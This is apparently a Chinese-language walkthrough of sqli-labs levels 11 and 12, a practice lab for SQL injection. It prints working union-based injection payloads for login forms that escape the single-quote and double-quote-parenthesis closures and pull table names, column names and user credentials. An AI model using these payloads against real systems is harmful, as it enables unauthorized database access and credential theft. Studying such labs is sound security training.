sqli-labs注入漏洞解析--less-11/12

第十一关： 

这一关是一个表单提交，先浅试一下。

哈哈，提示登录失败啦，但是出现报错提示，说username这里输入报错了，或许这是一个突破点。

这不就出来了。占位符这里多做做就感觉出来了

这里单引号逃逸，注释掉后边的密码，简简单单查询出来，那就和之前的一样，简单粗暴上代码

aa' union  select 1,database()#

aa' union  select 1,group_concat(table_name)from information_schema.tables where table_schema='security'#

an' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'#

an' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

第十二关：

 浅试成功

这里和上一关的区别就是闭合方式的不一样，首先我们传入的uname使用双引号闭合，再传到username后使用)闭合，正常传值username=("aaa")这样子，逃逸：aa") union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #，执行后的语句：username=("an") union  select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #注释掉后边的语句，成功执行。